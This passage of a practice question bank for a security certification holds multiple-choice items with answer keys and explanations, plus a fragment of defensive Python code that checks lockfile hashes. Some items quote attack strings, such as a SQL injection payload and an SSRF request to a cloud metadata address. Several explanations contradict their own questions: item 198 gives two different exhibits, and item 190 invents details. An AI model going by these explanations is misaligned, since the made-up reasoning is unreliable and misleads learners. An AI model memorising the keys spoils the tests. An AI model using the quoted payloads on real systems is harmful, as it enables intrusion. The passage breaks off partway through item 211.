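    """Read the constructed lockfile format back; blank lines and '#' comments are skipped."""
    lock: Lock = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        spec, digest = line.split(" sha256=")
        name, version = spec.split("==")
        lock[(name, version)] = digest
    return lock


# Constructed artifacts: the reviewed package and a copy altered by one byte in transit
GOOD_ARTIFACT = b"example-utils 2.1.0: def pad(s, n): return s.rjust(n)\n"
TAMPERED_ARTIFACT = b"example-utils 2.1.0: def pad(s, n): return s.rjust(n) # x\n"

if __name__ == "__main__":
    lock: Lock = {}
    pin_dependency(lock, "example-utils", "2.1.0", GOOD_ARTIFACT)
    print(serialize_lock(lock), end="")
    for data in (GOOD_ARTIFACT, TAMPERED_ARTIFACT):
        ok, msgs = verify_build(lock, {("example-utils", "2.1.0"): data})
        print("BUILD OK" if ok else "BUILD BLOCKED", msgs)
```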

190
MCQmedium

Based on the exhibit, what type of malware is the most likely issue on the workstation?

A.Spyware, because the system appears to be collecting user data silently.
B.Ransomware, because the browser settings changed after installation.
C.Rootkit, because the endpoint security console detected an unknown process.
D.Worm, because the software was installed from an unofficial website.
AnswerA

Spyware is the best fit because the symptoms show covert data collection and tracking behavior. The unwanted browser extension, the repeated outbound traffic to a tracking domain, and the access to saved cookies all point to surveillance and data theft rather than encryption or destructive behavior.

Why this answer

The exhibit shows a browser extension installed from an unofficial website that is silently collecting browsing data, including keystrokes and visited URLs, which is characteristic of spyware. Spyware operates by gathering user information without consent, often through seemingly legitimate software, and the absence of encryption or user notification confirms this classification.

Exam trap

The trap here is that candidates confuse the symptom of changed browser settings with ransomware, but ransomware's primary action is file encryption or system lockout, not silent data collection, and the unofficial website installation is a red herring for worm propagation.

How to eliminate wrong answers

Option B is wrong because ransomware typically encrypts files or locks the system and demands payment, not merely changes browser settings after installation. Option C is wrong because a rootkit is designed to hide its presence and evade detection by security software, so an endpoint security console detecting an unknown process would indicate a different threat, not a rootkit. Option D is wrong because a worm self-replicates and spreads across networks without user interaction, whereas the issue here involves installation from an unofficial website, which is a common vector for spyware, not a worm.

191
MCQmedium

A vulnerability scan of a branch-office print server finds that its administrative web console is reachable from the internet. The appliance is still using the vendor's default password, and no access control list limits management access to the office subnet or VPN. Which remediation would reduce risk the most with the least disruption?

A.Increase the password length policy and leave the console publicly reachable.
B.Disable the management interface entirely and replace the device immediately.
C.Restrict management access to the office network or VPN and change the default credentials.
D.Apply a patch after the next quarterly maintenance window and keep the current exposure unchanged.
AnswerC

This is the best balance of security and operational impact. Publicly exposed administration interfaces are high-risk, especially when default credentials are still enabled. Limiting access to a trusted management network or VPN immediately reduces attack surface, while changing the vendor defaults removes a common compromise path. Together, these steps address the exposure without requiring a full replacement or major service outage.

Why this answer

Option C reduces risk the most with the least disruption by immediately addressing the two primary vulnerabilities: the default password and unrestricted internet exposure. Changing the default credentials prevents trivial authentication bypass, while restricting management access to the office subnet or VPN eliminates the attack surface from the public internet. This approach requires no hardware replacement or downtime, and it directly mitigates the highest-severity issues identified in the scan.

Exam trap

The trap here is that candidates may choose Option B (disable and replace) because it seems most secure, but they overlook that configuration changes (ACL and password reset) achieve the same security goal with far less disruption and cost.

How to eliminate wrong answers

Option A is wrong because increasing the password length policy does not address the fact that the default password is still in use; an attacker can still authenticate with the known default credential, rendering the policy change irrelevant. Option B is wrong because disabling the management interface entirely and replacing the device immediately is unnecessarily disruptive and costly; the device can be secured with configuration changes without replacement, and disabling the interface may prevent necessary administrative tasks. Option D is wrong because applying a patch after the next quarterly maintenance window leaves the console publicly reachable with default credentials for an extended period, which is a critical risk that should be remediated immediately, not deferred.

192
MCQeasy

A scan finds two issues: a critical vulnerability on an internet-facing VPN appliance with public exploit code, and a medium-severity issue on an internal test server. Which should be fixed first?

A.The internal test server issue, because test systems are always higher risk.
B.The VPN appliance issue, because it is critical and publicly exploitable.
C.Both issues at the same time without assigning a priority.
D.Neither issue, because scanners can produce false positives.
AnswerB

An internet-facing critical vulnerability with available exploit code presents a much higher likelihood of real-world compromise and should be prioritized first.

Why this answer

The VPN appliance issue should be fixed first because it is a critical vulnerability on an internet-facing system with publicly available exploit code. This combination means an attacker can directly compromise the appliance from the internet with minimal effort, leading to potential network breach and lateral movement. In contrast, the internal test server is less accessible and poses a lower immediate risk, even though it should still be addressed in due course.

Exam trap

The trap here is that candidates assume all vulnerabilities must be fixed in order of severity alone, ignoring the critical factor of asset exposure and exploitability, which CompTIA emphasizes in risk-based prioritization.

How to eliminate wrong answers

Option A is wrong because test systems are not inherently higher risk than internet-facing production systems; the risk is determined by exposure, exploitability, and impact, not by system role alone. Option C is wrong because security resources are finite and prioritization is essential; treating all issues equally ignores the urgency of a critical, publicly exploitable vulnerability on an internet-facing asset.

193
Multi-Selecteasy

A small business web server still allows remote administration from the internet on port 3389, and the administrator password has never been changed from the vendor default. Which two issues should the security team prioritize first? Select two.

Select 2 answers
A.An exposed remote administration service
B.Default credentials still being in use
C.A missing screen-lock timeout on nearby laptops
D.A lack of encrypted email attachments
E.An outdated printer driver on the finance network
AnswersA, B

An internet-exposed management service is risky because it gives attackers a direct path to the system from outside the network.

Why this answer

Port 3389 is used by Remote Desktop Protocol (RDP), which is a remote administration service. Exposing RDP directly to the internet is a critical vulnerability because it allows attackers to perform brute-force or credential-stuffing attacks against the service. This is a high-priority issue because it provides an attack vector that can lead to full system compromise.

Exam trap

The trap here is that candidates may overlook the combination of exposed RDP and default credentials as the most urgent issues, instead focusing on a less critical physical security control like screen-lock timeout, which is not directly related to the internet-facing vulnerability.

194
MCQeasy

A user opens an attached document, and the endpoint security tool shows PowerShell running from memory with no new executable file written to disk. What type of attack is most likely?

A.Fileless attack
B.Ransomware
C.Rootkit
D.Logic bomb
AnswerA

Fileless attacks use legitimate tools or memory-only execution instead of dropping a visible malicious file.

Why this answer

The scenario describes PowerShell running from memory without a new executable file written to disk, which is the hallmark of a fileless attack. Fileless attacks leverage legitimate system tools like PowerShell, WMI, or .NET to execute malicious code directly in memory, bypassing traditional file-based detection mechanisms.

Exam trap

The trap here is that candidates may confuse 'fileless' with 'no malware at all' or think that any attack using PowerShell must be a script-based attack, but the key indicator is the lack of a new executable file on disk, which distinguishes fileless attacks from traditional malware that writes files.

How to eliminate wrong answers

Option B (Ransomware) is wrong because ransomware typically encrypts files and demands payment, often writing executable files to disk or dropping a ransom note; the absence of a new executable file on disk makes this unlikely. Option C (Rootkit) is wrong because rootkits are designed to hide their presence and maintain persistent access, often by modifying the operating system kernel or boot process, not by executing solely from memory without any file artifacts. Option D (Logic bomb) is wrong because a logic bomb is a piece of malicious code that executes under specific conditions (e.g., a date or user action) and is usually embedded within a legitimate file or application, not executed purely from memory without a file.

195
MCQmedium

A security analyst is reviewing the source code of a custom authentication service. The service uses a function that compares a user-supplied password to the stored password hash by iterating through each byte and returning false immediately upon the first mismatch. The analyst measures the function's execution time and discovers it varies measurably depending on how many initial bytes match. Which type of attack is this vulnerability most likely to facilitate?

A.Brute-force attack
B.Dictionary attack
C.Replay attack
D.Timing attack
AnswerD

A timing attack exploits measurable variations in the time it takes to execute a cryptographic operation. In this case, the early-exit comparison enables an attacker to deduce the correct secret byte by byte, making it the correct classification.

Why this answer

The vulnerability is a timing attack because the comparison function returns false immediately upon the first mismatched byte, causing execution time to vary based on how many initial bytes match. An attacker can measure these timing differences to iteratively guess each byte of the password hash, effectively reducing the search space from exponential to linear. This is a classic side-channel attack that exploits observable timing variations in cryptographic or authentication operations.

Exam trap

The trap here is that candidates may confuse a timing attack with a brute-force or dictionary attack, not realizing that the key clue is the measurable variation in execution time due to early exit on mismatch, which is a classic side-channel indicator.

How to eliminate wrong answers

Option A is wrong because a brute-force attack tries all possible password combinations without leveraging timing differences; it relies on computational power, not side-channel information. Option B is wrong because a dictionary attack uses a precomputed list of common passwords or hashes, not timing measurements of the comparison function. Option C is wrong because a replay attack captures and retransmits valid authentication data (e.g., a token or hash) to impersonate a user; it does not involve analyzing execution time of a comparison function.
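The early-exit comparison from the question beside a constant-time one, as an added example that is not part of the original page. Rather than timing wall-clock, each function also returns how many bytes it examined, which is a deterministic stand-in for the elapsed time an observer would measure; the stored digest and guesses are constructed, and both sides are assumed to be the same length, as fixed-size hashes are.

```python
"""Early-exit versus constant-time byte comparison, with the examined-byte count exposed.

Added example. Returning `bytes_examined` makes the leak visible without flaky timers.
"""
import hmac
from typing import List, Tuple


def compare_early_exit(stored: bytes, supplied: bytes) -> Tuple[bool, int]:
    """The pattern the question describes: stop at the first mismatch.
    The work done (and so the time taken) grows with the length of the matching prefix."""
    if len(stored) != len(supplied):
        return False, 0
    examined = 0
    for a, b in zip(stored, supplied):
        examined += 1
        if a != b:
            return False, examined  # leaks position of the first mismatch
    return True, examined


def compare_constant_time(stored: bytes, supplied: bytes) -> Tuple[bool, int]:
    """Hardened form: accumulate differences with OR and never exit early, so every
    same-length comparison examines every byte regardless of where mismatches occur."""
    if len(stored) != len(supplied):
        return False, 0
    diff = 0
    examined = 0
    for a, b in zip(stored, supplied):
        diff |= a ^ b
        examined += 1
    return diff == 0, examined


def compare_library(stored: bytes, supplied: bytes) -> bool:
    """What production code should call: the standard library's constant-time compare."""
    return hmac.compare_digest(stored, supplied)


def examined_per_guess(compare, stored: bytes, guesses: List[bytes]) -> List[int]:
    """Run a sequence of guesses through `compare` and collect the examined-byte counts.
    For the early-exit version the counts climb with the matching prefix; for the
    constant-time version they are flat, which is the property a reviewer wants to see."""
    return [compare(stored, g)[1] for g in guesses]


# Constructed 8-byte hex digest and guesses whose matching prefix grows by a few bytes each
STORED_DIGEST = b"3f2a9c1b"
GUESSES = [b"0xxxxxxx", b"3fxxxxxx", b"3f2a9xxx", b"3f2a9c1b"]

if __name__ == "__main__":
    print("early-exit   :", examined_per_guess(compare_early_exit, STORED_DIGEST, GUESSES))
    print("constant-time:", examined_per_guess(compare_constant_time, STORED_DIGEST, GUESSES))
```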

196
MCQmedium

Several employees report receiving SMS messages that appear to come from the corporate service desk. The text says, 'Your password expires today. Review the notice here,' followed by a shortened link that opens a fake sign-in page on a phone browser. Which type of attack is this?

A.Smishing
B.Pretexting
C.Tailgating
D.Spoofing
AnswerA

Smishing is phishing delivered through SMS or other text messaging platforms. The message uses urgency and a link to a fake login page to steal credentials.

Why this answer

This is smishing because the attack uses SMS messages to deliver a phishing link that directs recipients to a fake sign-in page, attempting to steal their credentials. Smishing is a form of social engineering that exploits the trust in text messaging and the urgency of a password expiration notice to bypass email security filters.

Exam trap

CompTIA often tests the distinction between smishing and spoofing, where candidates mistakenly choose spoofing because the SMS appears to come from the service desk, but the core attack vector is the social engineering via SMS, not just the falsified sender information.

How to eliminate wrong answers

Option B is wrong because pretexting involves fabricating a scenario (pretext) to obtain information or access, often through voice calls or impersonation, not through SMS with a malicious link. Option C is wrong because tailgating is a physical security attack where an unauthorized person follows an authorized individual into a restricted area, not a digital or messaging-based attack. Option D is wrong because spoofing refers to falsifying data (e.g., IP address, email header, caller ID) to impersonate a trusted source, but the attack described is specifically a social engineering technique using SMS, which is classified as smishing, not just spoofing.

197
MCQ · medium

A security analyst discovers that an attacker maintained persistent access to a corporate network for six months, moving laterally between systems and exfiltrating sensitive data. The attacker used custom malware that evaded antivirus and established multiple backdoors. Which of the following best describes this type of threat actor and their campaign?

A. Insider threat
B. Advanced persistent threat (APT)
C. Zero-day exploit
D. Denial of service (DoS) attack
Answer: B

APT correctly describes a threat actor that establishes a long-term presence, uses custom malware, and conducts lateral movement and data exfiltration, all of which are present in the scenario. APTs are designed to remain undetected while achieving strategic goals over months or years.

Why this answer

The scenario describes a threat actor that maintained stealthy, long-term access to a network, moved laterally, and exfiltrated data over six months using custom malware that evaded antivirus. This aligns with the definition of an Advanced Persistent Threat (APT), which is a sophisticated, well-resourced adversary that conducts prolonged, targeted campaigns to achieve specific objectives, often espionage or data theft.

Exam trap

The trap here is that candidates may confuse 'advanced persistent threat' with a specific exploit technique like a zero-day, or assume any long-term access is an insider threat, but the key differentiator is the external, resource-intensive, and stealthy nature of the campaign described.

How to eliminate wrong answers

Option A is wrong because an insider threat originates from within the organization (e.g., a disgruntled employee or contractor) and typically does not require custom malware that evades antivirus or multiple backdoors for lateral movement over six months; the scenario describes external-style persistence and evasion. Option C is wrong because a zero-day exploit refers to a specific, previously unknown vulnerability used in an attack, not the overall campaign or threat actor type; the question asks for the description of the threat actor and their campaign, not the exploit method. Option D is wrong because a Denial of Service (DoS) attack aims to disrupt availability of services, not to maintain persistent access, move laterally, or exfiltrate data; it is a different attack objective entirely.

198
MCQ · hard

Based on the exhibit, which vulnerability is being exploited?

A. Cross-site scripting (XSS)
B. Cross-site request forgery (CSRF)
C. Authentication bypass
D. Command injection
Answer: C

The backend is trusting client-influenced headers and a forwarded path value to reach an administrative endpoint. The logs show a normal analyst account reaching /admin/export after supplying X-Original-URL, which indicates the application or proxy is failing to enforce access controls consistently. That is an authentication or authorization bypass caused by trusting data the client can manipulate.

Why this answer

The exhibit shows a URL parameter `?admin=false` being changed to `?admin=true`, which directly toggles an administrative access control flag. This is a classic authentication bypass vulnerability because the application trusts client-supplied input to determine authorization status, allowing an attacker to escalate privileges without valid credentials.

Exam trap

The trap here is that candidates confuse parameter manipulation for privilege escalation with CSRF, but CSRF requires an authenticated victim to unknowingly submit a request, whereas this attack directly alters the authorization flag without needing another user's session.

How to eliminate wrong answers

Option A is wrong because cross-site scripting (XSS) requires injecting malicious scripts into web pages, not manipulating URL parameters to gain admin access. Option B is wrong because cross-site request forgery (CSRF) tricks a user into performing unintended actions using their existing session, but does not involve directly modifying a parameter to bypass authentication. Option D is wrong because command injection involves injecting OS commands into input fields that are executed by the server, not altering a boolean parameter in a URL to change authorization state.

199
MCQ · medium

An EDR alert shows a Windows workstation used certutil.exe to download an encoded script, then created a scheduled task named UpdateCheck that runs every 15 minutes. The machine is also making short HTTPS connections to the same external IP. What is the best description of what the attacker is doing?

A. A buffer overflow exploit is likely corrupting memory in the operating system.
B. Living-off-the-land abuse with persistence through a scheduled task is occurring.
C. The evidence most strongly suggests a drive-by download from a compromised browser session.
D. A man-in-the-middle attack is intercepting and modifying the TLS session.
Answer: B

The attacker is using legitimate system utilities, such as certutil.exe and the Windows task scheduler, to download, execute, and persist malicious code. That pattern strongly suggests living-off-the-land abuse rather than a custom malware loader. The recurring outbound HTTPS traffic to a single external host also fits command-and-control activity. This combination is common when attackers want to blend in with normal administrative behavior and survive reboots without dropping obvious binaries.

Why this answer

Option B is correct because the attacker is using certutil.exe, a native Windows tool, to download an encoded script (living-off-the-land), and then creating a scheduled task named UpdateCheck to maintain persistence by running every 15 minutes. This combination of abusing trusted binaries and establishing a recurring task is a classic indicator of LOTL abuse with persistence.

Exam trap

The trap here is that candidates may confuse the use of a native tool like certutil.exe with a buffer overflow or drive-by download, failing to recognize the living-off-the-land technique and persistence via scheduled tasks as the core indicators.

How to eliminate wrong answers

Option A is wrong because a buffer overflow exploit corrupts memory to execute arbitrary code, but the evidence shows no memory corruption or exploitation—just the use of certutil.exe and scheduled tasks. Option C is wrong because a drive-by download typically involves a browser exploit or malicious script executed via a compromised website, whereas here the attacker actively used certutil.exe to download a script and created a scheduled task, indicating post-exploitation activity rather than initial infection. Option D is wrong because a man-in-the-middle attack would intercept or modify TLS sessions, but the evidence only shows short HTTPS connections to an external IP, which is consistent with command-and-control traffic, not TLS interception or modification.

200
MCQ · easy

Threat intelligence shows an attacker changes domains every day, but the malware file itself stays the same across incidents. Which indicator would be the best to block immediately if you find it in your environment?

A. The current weather in the city where the attack was observed
B. The malware file hash from the shared sample
C. The logo used on the phishing email
D. The time zone used by the help desk
Answer: B

A file hash can directly identify the same malware sample even when the attacker rotates domains and hosting infrastructure.

Why this answer

The malware file hash (e.g., MD5, SHA-1, or SHA-256) is a unique fingerprint of the file's binary content. Since the malware file itself remains unchanged across incidents, its hash is a static, reliable indicator of compromise (IoC) that can be immediately blocked via file reputation or hash-based detection rules, regardless of domain changes.

Exam trap

The trap here is that candidates may focus on the attacker's changing domains (a dynamic indicator) and overlook the static file hash, which is the most reliable and immediately actionable indicator when the malware binary is unchanged.

How to eliminate wrong answers

Option A is wrong because the current weather is an environmental variable unrelated to the malware's identity or behavior; it has no forensic value as a static indicator. Option C is wrong because a phishing email logo is a visual element that can be easily altered or reused by different threat actors, and it does not uniquely identify the malware file itself. Option D is wrong because the help desk time zone is an operational parameter of the organization, not an indicator of compromise; it provides no information about the attacker's tools or tactics.

201
MCQ · easy

Employees in a lobby say their phones automatically connected to a wireless network named CorpWiFi, even though the legitimate access point was offline. They were then shown a fake sign-in page. What threat is this?

A. An evil twin access point impersonating the real corporate wireless network
B. A Bluetooth replay attack that reuses captured pairing data
C. A cloud misconfiguration exposing a storage bucket to the internet
D. A dependency compromise in a software library used by the company portal
Answer: A

An evil twin is a rogue access point that copies a trusted SSID to lure users into connecting.

Why this answer

This is an evil twin attack. The attacker sets up a rogue access point broadcasting the same SSID (CorpWiFi) as the legitimate network. When the real access point goes offline, client devices automatically connect to the stronger signal of the rogue AP, allowing the attacker to present a fake captive portal to harvest credentials.

Exam trap

The trap here is that candidates may confuse an evil twin with a rogue access point, but the key distinction is that an evil twin specifically impersonates a legitimate SSID to trick clients into connecting, whereas a rogue AP is simply an unauthorized device on the network.

How to eliminate wrong answers

Option B is wrong because a Bluetooth replay attack involves capturing and retransmitting Bluetooth pairing packets to gain unauthorized access, not connecting to a Wi-Fi network or presenting a fake sign-in page. Option C is wrong because a cloud misconfiguration exposing a storage bucket would allow unauthorized data access via the internet, not cause phones to auto-connect to a rogue Wi-Fi network. Option D is wrong because a dependency compromise in a software library would affect the company portal's code execution or data integrity, not involve wireless network impersonation or captive portal phishing.

202
MCQ · hard

An accounts payable clerk receives an email that appears to continue an existing thread with a shipping vendor. The sender name, signature block, and invoice number all match a real open order, and the message asks the clerk to use a "new payment portal" and confirm bank details before 3 PM to avoid delayed shipment. The email contains no attachments and only one URL. Which attack type is most likely?

A. Spear phishing, because the email uses targeted business context and time pressure.
B. Pretexting, because the attacker is impersonating a trusted vendor to create a believable reason for the request.
C. Smishing, because the attacker is using a text message to reach the victim.
D. Baiting, because the attacker is offering a portal link that appears helpful to the recipient.
Answer: B

Pretexting is the best fit because the attacker builds a believable story around a trusted vendor relationship and asks for a sensitive business action. The value is in the fabricated scenario, not just the delivery channel. The realistic invoice details and urgency support the pretext, which is a common pattern in payment-change scams and business email compromise.

Why this answer

Option B is correct because the attacker is not just sending a generic targeted email but is actively impersonating a trusted vendor and fabricating a scenario (the need to use a new payment portal to avoid shipment delay) to manipulate the victim into divulging sensitive bank details. This aligns with pretexting, where the attacker creates a false pretext (a believable reason) to obtain information, rather than relying on malicious attachments or links alone. The email's use of an existing thread, matching sender details, and time pressure all support the pretext, making it a classic impersonation-based social engineering attack.

Exam trap

The trap here is that candidates often confuse pretexting with spear phishing because both involve targeted emails, but the key distinction is that pretexting relies on a fabricated scenario to manipulate the victim into action, whereas spear phishing typically uses a malicious link or attachment to compromise the system directly.

How to eliminate wrong answers

Option A is wrong because spear phishing typically involves a targeted email with a malicious payload (e.g., a link to a credential-harvesting site or an attachment with malware), but here the attack relies on the fabricated scenario and impersonation to trick the victim into voluntarily providing bank details, not on exploiting a technical vulnerability via a link. Option C is wrong because smishing specifically refers to SMS text message attacks, not email-based attacks. Option D is wrong because baiting involves offering something enticing (e.g., a free download or USB drive) to lure the victim into a trap, whereas this attack uses a fabricated reason (pretext) to request sensitive information, not an offer of a helpful portal link.

203
MCQ · medium

A file-conversion API accepts a URL to generate a preview image. An attacker submits a URL for the cloud metadata service at 169.254.169.254 and receives instance credentials in the preview output. What attack is this?

A. SQL injection
B. Server-side request forgery
C. Cross-site request forgery
D. Command injection
Answer: B

Server-side request forgery occurs when an attacker tricks a server into making an unintended request to an internal or privileged resource.

Why this answer

The attack is Server-Side Request Forgery (SSRF) because the attacker manipulates the file-conversion API into making an outbound HTTP request to an internal IP address (169.254.169.254, the cloud metadata service). The API then returns the metadata (including instance credentials) in the generated preview image, exploiting the server's trust to access internal resources that are not directly accessible from the internet.

Exam trap

The trap here is that candidates confuse SSRF with CSRF because both involve 'request forgery,' but SSRF targets server-side requests to internal resources, while CSRF targets user-side requests to perform unauthorized actions.

How to eliminate wrong answers

Option A is wrong because SQL injection involves injecting malicious SQL queries into input fields to manipulate a database, not making the server request internal URLs. Option C is wrong because Cross-Site Request Forgery (CSRF) tricks an authenticated user's browser into performing unwanted actions on a trusted site, not exploiting server-side URL fetching. Option D is wrong because command injection involves injecting operating system commands into input that is executed by the server, not manipulating URL requests to internal services.

204
Multi-Select · easy

An employee reports a suspicious email that appears to be from the help desk. Which two details are the strongest signs of phishing? Select two.

Select 2 answers
A. The message creates urgency and threatens account suspension within 15 minutes.
B. The sender address uses a look-alike domain with one letter changed.
C. The email signature includes the company logo and a professional font.
D. The message was delivered during normal business hours.
E. The subject line includes the employee's department name.
Answers: A, B

Urgent pressure is a common social engineering tactic used to stop the user from verifying the request carefully.

Why this answer

Option A is correct because creating a false sense of urgency, such as threatening account suspension within 15 minutes, is a classic social engineering tactic used in phishing to bypass rational thinking and prompt immediate action. This exploits the recipient's fear of losing access, which is a psychological trigger rather than a technical indicator, but it is one of the strongest behavioral signs of a phishing attempt.

Exam trap

The trap here is that candidates often focus on technical indicators like sender address or domain spoofing (Option B) as the strongest sign, but the exam emphasizes that urgency and threats are equally strong behavioral red flags, and both A and B are correct in this question.

205
MCQ · medium

A vulnerability scan finds that an administrative SSH service on a Linux server is listening on 0.0.0.0 and is reachable from the internet. The server is meant to be managed only from the internal admin subnet. What is the best remediation?

A. Patch the SSH client on administrator laptops so the server cannot be reached externally.
B. Restrict SSH to the management network and block public access with firewall or host-based rules.
C. Enable a captive portal on the public interface so only authenticated users see the service.
D. Replace SSH with FTP because FTP can be configured to allow administrative access more easily.
Answer: B

Limiting the service to the internal management subnet removes unnecessary exposure and aligns with least exposure and secure administration practices.

Why this answer

Option B is correct because the vulnerability is that SSH is exposed to the internet on 0.0.0.0, which violates the principle of least privilege and exposes the administrative interface to unauthorized access. The best remediation is to restrict SSH to the internal management subnet using firewall rules (e.g., iptables, security group ACLs) or host-based rules (e.g., TCP Wrappers via /etc/hosts.allow), ensuring only trusted internal IPs can reach the service. This directly addresses the exposure without changing the protocol or client configuration.

Exam trap

The trap here is that candidates may think patching the client (Option A) or adding authentication (Option C) solves the exposure, but the core issue is network-level access control—no amount of client-side patching or portal authentication can prevent an attacker from reaching the open SSH port from the internet.

How to eliminate wrong answers

Option A is wrong because patching the SSH client on administrator laptops does nothing to prevent external attackers from reaching the server; the server is still listening on 0.0.0.0 and accessible from the internet. Option C is wrong because a captive portal is a web-based authentication mechanism typically used for guest networks, not for securing an SSH service; SSH does not support captive portal redirection, and this would not prevent direct TCP access to port 22. Option D is wrong because FTP transmits credentials and data in cleartext by default, which is far less secure than SSH; replacing SSH with FTP would increase the attack surface and violate security best practices for administrative access.

206
MCQ · medium

A security analyst discovers that an organization's web application is vulnerable to SQL injection. The application uses a legacy database driver that does not support parameterized queries. Which of the following is the BEST mitigation to prevent this vulnerability?

A. Implement a web application firewall (WAF) to filter malicious input.
B. Update the database driver to a version that supports parameterized queries.
C. Encode all user input using HTML encoding.
D. Disable error messages that reveal database schema.
Answer: B

Parameterized queries ensure that user input is treated as data, not executable code, which is the definitive prevention for SQL injection. Updating the driver to support this is the best long-term mitigation.

Why this answer

Option B is correct because the root cause of the SQL injection vulnerability is the legacy database driver that does not support parameterized queries. Updating the driver to a modern version that supports parameterized queries (also known as prepared statements) allows the application to separate SQL logic from user-supplied data, effectively preventing SQL injection at the database layer. This addresses the fundamental flaw rather than relying on external filtering or encoding.

Exam trap

The trap here is that candidates often choose a WAF (Option A) as a quick fix, overlooking that it only mitigates symptoms rather than eliminating the root cause, which is the lack of parameterized query support in the database driver.

How to eliminate wrong answers

Option A is wrong because implementing a web application firewall (WAF) is a compensating control that filters malicious input based on signatures or heuristics, but it can be bypassed with obfuscated payloads and does not fix the underlying insecure code. Option C is wrong because HTML encoding is designed to prevent cross-site scripting (XSS) by neutralizing HTML special characters, not SQL injection; it does not prevent an attacker from injecting SQL commands into database queries.

207
Multi-Select · hard

Threat intelligence reports a campaign that rotates domains daily and repacks the malware for each delivery. Analysts also observe the same TLS certificate fingerprint, the same mutex name, and the same JA3 client fingerprint across multiple samples. Which three indicators are most useful to prioritize for hunting or blocking? Select three.

Select 3 answers
A. The TLS certificate fingerprint reused by multiple samples.
B. The mutex name created by the malware on infected endpoints.
C. The JA3 client fingerprint observed in outbound TLS sessions.
D. The current domain name used by the command-and-control server.
E. The public IP address currently hosting the malware sample.
Answers: A, B, C

A reused certificate fingerprint is harder for attackers to change quickly than a daily domain. It can identify infrastructure or tooling reused across campaigns. Because it appears across multiple samples, it is a durable hunting and blocking indicator compared with short-lived hostnames.

Why this answer

The TLS certificate fingerprint is a reliable indicator because it is derived from the certificate's public key and metadata, which remain static even when the malware's domain or IP address changes. Since the threat intelligence report states the same fingerprint is reused across multiple samples, this provides a stable, immutable identifier that can be used to detect or block malicious TLS handshakes regardless of domain rotation.

Exam trap

CompTIA often tests the concept that dynamic indicators like domains and IPs are less reliable for persistent detection compared to static artifacts such as cryptographic fingerprints or mutex names, which remain constant despite infrastructure changes.

208
MCQ · easy

Analysts see a malware campaign that changes its command-and-control domain every day, but the executable hash and a unique registry value remain the same across incidents. Which indicator is the best candidate for hunting?

A. The daily domain name used for command and control.
B. The executable hash from the malware sample.
C. The employee's home city where the alert was observed.
D. The brand of the user's keyboard and mouse.
Answer: B

A stable hash is a strong, specific indicator when the malware file itself remains unchanged.

Why this answer

Option B is correct because the executable hash (e.g., SHA-256) and the unique registry value are static, immutable artifacts that persist across every incident, regardless of the daily domain rotation. These indicators are far more reliable for hunting since they directly identify the malware binary itself, whereas the domain changes frequently and may be blocked or sinkholed after detection.

Exam trap

The trap here is that candidates focus on the changing domain (a dynamic indicator) because it is directly observable in network traffic, but the exam tests the understanding that static indicators (like the hash) are more persistent and effective for hunting across multiple incidents.

How to eliminate wrong answers

Option A is wrong because the daily domain name is a volatile indicator that changes every day, making it unreliable for long-term hunting; it would require constant updates and may already be taken down by the time it is used. Option C is wrong because the employee's home city is a geographic attribute unrelated to the malware's technical characteristics and cannot be used to identify or track the specific malware campaign. Option D is wrong because the brand of the user's keyboard and mouse is a hardware peripheral detail that has no bearing on the malware's behavior or persistence, and it is not a valid indicator of compromise.

209
MCQ · medium

An administrator notices that a finance file share remained normal for weeks after a former contractor left the company. This morning, multiple PDFs and spreadsheets were deleted, and a scheduled task created months ago is now executing a script that wipes files in the shared folder. Which malware type is most consistent with this behavior?

A. Logic bomb triggered by a time or condition after being planted earlier
B. Worm that is automatically propagating to other endpoints
C. Spyware that is secretly collecting keystrokes and screenshots
D. Rootkit that is hiding itself in the kernel to maintain stealth
Answer: A

A logic bomb is the best fit because malicious code was planted earlier and remained dormant until a trigger condition caused it to execute. The scheduled task and delayed destructive action are classic signs of a hidden payload designed to activate later, sometimes after a user departure, date, or system event. The time gap strongly supports this interpretation.

Why this answer

The behavior matches a logic bomb: malicious code planted in advance (the scheduled task created months ago) that remains dormant until triggered by a specific condition (the passage of time or a date). The file share was normal for weeks because the logic bomb had not yet met its trigger condition; once triggered, it executed the script to delete files. This contrasts with other malware types that require active propagation, continuous monitoring, or kernel-level hiding.

Exam trap

The trap here is that candidates may confuse a logic bomb with a worm because both can cause widespread damage, but the key distinction is the pre-planted, dormant nature of the logic bomb versus the active self-propagation of a worm.

How to eliminate wrong answers

Option B is wrong because a worm self-propagates across networks without user intervention, but here the malware was planted as a scheduled task months ago and only activated recently, with no evidence of lateral movement or replication. Option C is wrong because spyware focuses on covert data collection (keystrokes, screenshots) and does not typically delete files or execute destructive scripts via scheduled tasks. Option D is wrong because a rootkit hides its presence by modifying the OS kernel or system calls, whereas the described behavior involves a visible scheduled task and file deletion without any stealth mechanisms.

210
MCQ · medium

An API log shows repeated requests such as `GET /api/orders?orderId=105%20OR%201=1--` followed by responses containing many customers' order records instead of one record. Which attack is most likely?

A. SQL injection, because the attacker is altering the database query through crafted input.
B. Cross-site scripting, because malicious code is being reflected in the browser.
C. Cross-site request forgery, because the request appears to be an unauthorized action.
D. Broken access control, because the API is not validating the user role correctly.
Answer: A

The injected condition `OR 1=1--` is a classic indicator that user input is being interpreted as part of a database query. The application returns too much data because the attacker has manipulated the SQL logic.

Why this answer

The request includes `%20OR%201=1--`, which URL-decodes to ` OR 1=1--`. This is a classic SQL injection payload that appends a tautology (`OR 1=1`) and comments out the rest of the query (`--`). The API log shows that instead of returning a single order record, the response contains many customers' order records, confirming that the injected condition bypassed the intended WHERE clause and returned all rows from the orders table.

Exam trap

The trap here is that candidates may see the word 'API' and assume the attack is related to access control or CSRF, but the presence of SQL comment syntax (`--`) and the tautology (`OR 1=1`) in the request parameter is the definitive indicator of SQL injection.

How to eliminate wrong answers

Option B is wrong because cross-site scripting (XSS) involves injecting client-side scripts (e.g., JavaScript) into a web page viewed by other users, not altering database queries to retrieve unauthorized data. Option C is wrong because cross-site request forgery (CSRF) tricks an authenticated user into performing an unintended action, but the log shows direct crafted input in the API request, not a forged request from another site. Option D is wrong because broken access control would involve missing or flawed authorization checks on the API endpoint, but the attack here exploits a database-level injection vulnerability, not a failure to validate user roles or permissions.

211
MCQ · hard

A SaaS dashboard invalidates passwords after a forced reset, but a stolen bearer token from a browser cookie still works from a VPN exit node for several hours. SIEM logs show the same token value used from two countries within five minutes, and no MFA prompt appears because the token is already accepted. What attack is most likely?

A. Session hijacking, because a valid session token is being replayed from a different location.
B. Credential stuffing, because the attacker used many passwords against the portal.
C. Cross-site request forgery, because the attacker is making requests on behalf of the user.
